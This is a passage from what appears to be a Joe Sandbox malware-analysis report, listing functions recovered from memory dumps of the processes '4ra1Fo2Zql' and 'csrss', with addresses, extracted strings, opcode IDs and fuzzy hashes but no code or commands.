                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 28315593817b17fe14230b521667c5a77be4b0c62c4bb6215b01c95ed2707653
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: BEB01240C5E40F04E41431FB08420B4F0407FC4144FC00070E40C40185AA5D1094024A

                                                      Non-executed Functions

                                                      Function 00007FF848E509B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.2332969496.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_7ff848e50000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction ID: a3a522484715945d4e2b20b52116875a4ff3ea2099a8acd90016f2f80befa4f0
                                                      • Opcode Fuzzy Hash: a7f1e62f3cbb6283991f3b626f1a4b753455670a3c222f9e522e663140620036
                                                      • Instruction Fuzzy Hash: A55137D6ACE8627DE11D36FDB4415FD6B48EF852B8F0C9677E04C890838E1860858AFD

                                                      Executed Functions

                                                      Function 00007FF848E90D48 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5X_H$<L_^
                                                      • API String ID: 0-2316843489
                                                      • Opcode ID: 003221545e3fbf9955b13fc0f8d401d92b1963ed61277222c13d7c4d5d08e35b
                                                      • Instruction ID: e11598b6d710d052668fc6a3e006419436ada83f3050a9d62906477b66f113e0
                                                      • Opcode Fuzzy Hash: 003221545e3fbf9955b13fc0f8d401d92b1963ed61277222c13d7c4d5d08e35b
                                                      • Instruction Fuzzy Hash: 79910071D1CA9D8FE789EB6888293A9BFE1FB56354F4401BEC049DB2D6DBB81804C711
                                                      Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5513dc4db8e762916c65c385405125afd5eb80eab951463c884d116ecfc80570
                                                      • Instruction ID: df9ac5849ecd45946b46eb0473cbc9c91f5c8f6db7224e97b0b6dde5b47e4b0d
                                                      • Opcode Fuzzy Hash: 5513dc4db8e762916c65c385405125afd5eb80eab951463c884d116ecfc80570
                                                      • Instruction Fuzzy Hash: 1651E071A28A9D8EE788EB6C88597B9BFE0FB86364F8401BEC009D73D5DBB51411C700
                                                      Function 00007FF848E908D0 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30860aa5fc36b517b0d5afa173e341734dd9d0c22d86dd54909d4ca7503a1512
                                                      • Instruction ID: 7d460863c1869a2b17ee0ac6980fed0734d9390291a2f00ed479f02c389cdab8
                                                      • Opcode Fuzzy Hash: 30860aa5fc36b517b0d5afa173e341734dd9d0c22d86dd54909d4ca7503a1512
                                                      • Instruction Fuzzy Hash: D3416D51A4D9963EE30AB3BCA0952FC7B80FF453A5F1844BBD44DC71E7DE286881C698
                                                      Function 00007FF848E90998 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c5483c494f6e1637615b6f797a0c798ea3c0b2ac1af68c4b898af9e7af992fe
                                                      • Instruction ID: e3713cbfc3c161bcd5fde2160d50f4270d75f4fa253d0cc1c048bb04c14854ea
                                                      • Opcode Fuzzy Hash: 2c5483c494f6e1637615b6f797a0c798ea3c0b2ac1af68c4b898af9e7af992fe
                                                      • Instruction Fuzzy Hash: 55213610B1CD592FEB48B77C404A67976C2EF99355F5400BAE80EC32D7DE68AC818684
                                                      Function 00007FF848E91171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 455bde7cc30b3dadb2e6f1df80948eb733cfceecbd884d9712ac7dfd9b6ffea9
                                                      • Instruction ID: 01f0bbdb5878787bde2fc82c360683e831ccb32d387708845b7b800089ce93bf
                                                      • Opcode Fuzzy Hash: 455bde7cc30b3dadb2e6f1df80948eb733cfceecbd884d9712ac7dfd9b6ffea9
                                                      • Instruction Fuzzy Hash: 3D31B030A0D68A8FDB46FB64C8549A97BF0FF16340F0901FAC009D72A3DB79A845C751
                                                      Function 00007FF848E90960 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7550288ed2a6aca1d0820b3541bebf5c4a03de440fb61201fa2b532ed6301bc9
                                                      • Instruction ID: 6684731e076660434cefc5918eb0b27c15c7c9257088641e6223532255e54fa3
                                                      • Opcode Fuzzy Hash: 7550288ed2a6aca1d0820b3541bebf5c4a03de440fb61201fa2b532ed6301bc9
                                                      • Instruction Fuzzy Hash: A3213751A4DD5A3EF65C73BC604A6F866C1FF483A9F1844BAE40DC31D7DD2CAC814698
                                                      Function 00007FF848E92A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction ID: 45cc82dd7392b2ebb5d80bde3321ae951944a704ece72f49c5a5f416bb756b35
                                                      • Opcode Fuzzy Hash: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction Fuzzy Hash: 85217122E0C90A4FEBA4FAA884547BC22D2FF943A4F9445B5D41DD3293DFB8AC408748
                                                      Function 00007FF848E90C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38f1de9513b550ad4a9365cdb936824b278b1ba2bf9cd59c758eeac36e9dbcae
                                                      • Instruction ID: 9abb19c1c655d9286827bcb78dea5a02602c6ae1f7b02d8a90f9aaddc5730222
                                                      • Opcode Fuzzy Hash: 38f1de9513b550ad4a9365cdb936824b278b1ba2bf9cd59c758eeac36e9dbcae
                                                      • Instruction Fuzzy Hash: 5821E531A0C6899FE711FBB8C8452EC7BB0FF42398F5545B6D0548B1D2DB781589C745
                                                      Function 00007FF848E93D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf702062c99b2c29bd24f5413e15b24b411f44003854a577ebac73e6b952de77
                                                      • Instruction ID: 5d0c60a9601a3c1bfaba92f4ff74b284bf48f2d65144215dc374f34a0afe636b
                                                      • Opcode Fuzzy Hash: bf702062c99b2c29bd24f5413e15b24b411f44003854a577ebac73e6b952de77
                                                      • Instruction Fuzzy Hash: 4B11EC70D08A198FDB94EB48C894BA9B3E1FB58315F1441BAD40DE72A0CB74AEC4CF85
                                                      Function 00007FF848E90C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction ID: 90e284778c9897b2c1963e39e1f766ee646615f2b69f5ad0d015767f3a853dbf
                                                      • Opcode Fuzzy Hash: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction Fuzzy Hash: EF11CE31A0C6899FE702FBA8C8412EC7FB0FF42354F5544B6C080DB292D67816498785
                                                      Function 00007FF848E90C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction ID: 6f2ab1f09430ffa3630ad3130ee30b940f2f52c7e742a361bd0d77d3400a4c34
                                                      • Opcode Fuzzy Hash: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction Fuzzy Hash: B3018C31A0D7899FE702FBA8C8842ED7FB0FF42354F5545A6C480DB292DA785649CB85
                                                      Function 00007FF848E90C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aaeb7a745910c7b27e207537ba0738f33cfbc8811ffb0d654c04b249fa9101b1
                                                      • Instruction ID: 2f4664481486e7c145ededd656483344333770c92159c6374260d3ef5a69129f
                                                      • Opcode Fuzzy Hash: aaeb7a745910c7b27e207537ba0738f33cfbc8811ffb0d654c04b249fa9101b1
                                                      • Instruction Fuzzy Hash: DD017C7190D7899FE702EB78C8842DDBFB0FF42354F5541E6D040DB2A2DA785A89C781
                                                      Function 00007FF848E94F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1014b829221fdf6960c5e30863a7d383ef3c386ea769203aae25daf2d8049f52
                                                      • Instruction ID: 7da85329ec41770b7d41e687b5d7c3882238a50177576800dfd6844253686a4c
                                                      • Opcode Fuzzy Hash: 1014b829221fdf6960c5e30863a7d383ef3c386ea769203aae25daf2d8049f52
                                                      • Instruction Fuzzy Hash: 56018F31D0D56A8FEBA1BBA484546B87B90FF54358F1401B6C40ED7282DFBD29418B45
                                                      Function 00007FF848E90C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e559d1192308e1dea2ad8082b29f88e65467c80ed945322e5a66698c5c31aad5
                                                      • Instruction ID: 85a9c8abbaf60d7b8646a8c09db957f98f90011fa9d83c5884423fc9c584ca24
                                                      • Opcode Fuzzy Hash: e559d1192308e1dea2ad8082b29f88e65467c80ed945322e5a66698c5c31aad5
                                                      • Instruction Fuzzy Hash: 90014B7090D7899FE702EBA4848429DBFB0FF02358F5441E6D440DB296DA785A88C745
                                                      Function 00007FF848E92B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: cdd74dee04ca8fb85ac5ba2d365fea55664557de4b60efd14d4495fd03ccf38f
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: E8F03C3194C85E8EEFB4FA54C8446EC73A2FB903A5F5442B5D41DD31A2DFF8A9818B48
                                                      Function 00007FF848E90B77 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b61cf4c546c5c40b025e0d04081fe64969569a2375d68c9b868f9d688e4ab09
                                                      • Instruction ID: 4e3951dd73a2a4532de53ca4690c97c5c97b6ab19a8c2ec3b32213a0d9f1f113
                                                      • Opcode Fuzzy Hash: 9b61cf4c546c5c40b025e0d04081fe64969569a2375d68c9b868f9d688e4ab09
                                                      • Instruction Fuzzy Hash: 69F0A03525EA89DFC742AB3C88A58D4BF60FF03204B9A11E9D089CB562C325585DCB42
                                                      Function 00007FF848E93824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: d0712fb9a3a27d196c041b1c78fe2ed482f18b66f23691b0113dcaa740ebb143
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B4E01A31E0C11A4FFB54F694C8517B962A1BF98388F5000B8D92ED36D3CFBC6D808A49
                                                      Function 00007FF848E91953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6383fa9e1c9771656466cbcd0e0e0b47654841ed9537788905e4daab5544b70a
                                                      • Instruction ID: dd734b8a665935c4fd66c5e14c1f03e16337a108770e5a4b3e73644d2182761b
                                                      • Opcode Fuzzy Hash: 6383fa9e1c9771656466cbcd0e0e0b47654841ed9537788905e4daab5544b70a
                                                      • Instruction Fuzzy Hash: 3DD05E21D1DA495EEB81B3F0841A2BD9292BF10354F880478D84E971C3CFBD34006A84
                                                      Function 00007FF848E906AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b8637e002c9e981cf58a50db7dd0400fca4ce7b093ae74931a6fd721af7db1d6
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 38C08C02D0F52B08E44031EF24020ACA1007FC4AACFD00032C50C40082AFED20D5014E
                                                      Function 00007FF848E9559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: f887e971c3a1ef3c90fb715d6d24ab0a4061c84229743e4734dd675adbf10a04
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FBD0C966C1D523CFFAB130D048241B90245BB903BDF694772D82E3A1C29FFDBD51861A
                                                      Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 5873d979e4127eabfa8ba6f9c0aa9d6ff0598408284057d1cc9789fef242b04c
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 41C08C305148088FC908FB29C88480437A0FF09204BC20090E008C7171D269DCC0C740
                                                      Function 00007FF848E94E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b179ee9b749437a95175b8d788bc2848d1435f5f1848f09f7dcb24a067edc346
                                                      • Instruction ID: e826250a99295fc0b853bf25a87b0b4d8529328486e76a824a7b04176872aacf
                                                      • Opcode Fuzzy Hash: b179ee9b749437a95175b8d788bc2848d1435f5f1848f09f7dcb24a067edc346
                                                      • Instruction Fuzzy Hash: EBC08C02E0DC5A9AE25A220440222BE44029F80788F8800B9E00E8A3CACF0C1E01028A
                                                      Function 00007FF848E906D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 8c79e3898800fdb711297317867d8e852c3a97d4dfb126889a3967a440f68eea
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 9CB00205C5E45F05E45431FB19460A974507FC555CFD51170D80D50185A9DD1595125A

                                                      Non-executed Functions

                                                      Function 00007FF848E909B0 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.2386945860.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_31_2_7ff848e90000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 5dfa4a017ca7f21550d4adce747497ee2f82ae229cff802ae6afa7f45f6e15fb
                                                      • Instruction ID: 677935ebcababdf093b0807f4e5c51e0347660e4735a7befde72b6a073c3378f
                                                      • Opcode Fuzzy Hash: 5dfa4a017ca7f21550d4adce747497ee2f82ae229cff802ae6afa7f45f6e15fb
                                                      • Instruction Fuzzy Hash: FE517CD6ACA9623DE11E36FDB4020F96B44EF813B9F4C9677E04C890934E59608686FD

                                                      Executed Functions

                                                      Function 00007FF848E50D48 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5\_H$<P_^
                                                      • API String ID: 0-2257120494
                                                      • Opcode ID: 51007bf3465af3c2f5c4d055fc6adbd850737fb1d03557a55fdf25353996c37a
                                                      • Instruction ID: de52f35587a2877f145ed28e5f7c6b367b28e60bbbf84209f56f3957f381a79b
                                                      • Opcode Fuzzy Hash: 51007bf3465af3c2f5c4d055fc6adbd850737fb1d03557a55fdf25353996c37a
                                                      • Instruction Fuzzy Hash: 34910FB0D1CA899FE789EF6888697A9BFE1FB96750F0401BED009D72D2DB782405C711
                                                      Function 00007FF848E612B2 Relevance: 2.0, Strings: 1, Instructions: 777COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JH
                                                      • API String ID: 0-1110330275
                                                      • Opcode ID: a9e13b31a14580615ecc3330b56d72602964710bb357e148f4dc11d04e207cb6
                                                      • Instruction ID: ada1d63b1527a00983e3b0d71e8172e8e0a575f5c23f3a110cb823bde4460e6c
                                                      • Opcode Fuzzy Hash: a9e13b31a14580615ecc3330b56d72602964710bb357e148f4dc11d04e207cb6
                                                      • Instruction Fuzzy Hash: 8932A321E1CD5A9FEA99FA2884956B873E2FF94780F4441B9D00DD3287DF39BC428785
                                                      Function 00007FF848E838ED Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_H
                                                      • API String ID: 0-402390507
                                                      • Opcode ID: 150d7a2cdea911aa89175b5207eecf0953c95617b9798ae1a70095e85aa4cd7c
                                                      • Instruction ID: c0b8ffada0d06663e0bae6ed3285fcbd40de4b46cf9007f5d4a018bd8c122525
                                                      • Opcode Fuzzy Hash: 150d7a2cdea911aa89175b5207eecf0953c95617b9798ae1a70095e85aa4cd7c
                                                      • Instruction Fuzzy Hash: DA819021E1CD8A5FEA98FA2C84563B973D2FF59781F8451B9D40DC32C7DE38A8418785
                                                      Function 00007FF848E83943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_H
                                                      • API String ID: 0-402390507
                                                      • Opcode ID: 41e3e96f56ef98869561ea4c8e9198bce43167bff8c15aee31467ea67342a1c6
                                                      • Instruction ID: 7e48b810852f80ef8bb14a1130bae11b4812987a8cc046ce30fa386e3f137131
                                                      • Opcode Fuzzy Hash: 41e3e96f56ef98869561ea4c8e9198bce43167bff8c15aee31467ea67342a1c6
                                                      • Instruction Fuzzy Hash: FF517221E1CD4A5FEB98FA6C84563B973D2FB98781F8491B9D40EC3287DE38A8414745
                                                      Function 00007FF848E821E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 884b935fe21e5beee21326acdb660c01b30ad89bbd1b1b814e7e9523caa8c666
                                                      • Instruction ID: 96e1521f755d44604ec613ebba67346e1c9af8096d442de4b9294235bc34c5e5
                                                      • Opcode Fuzzy Hash: 884b935fe21e5beee21326acdb660c01b30ad89bbd1b1b814e7e9523caa8c666
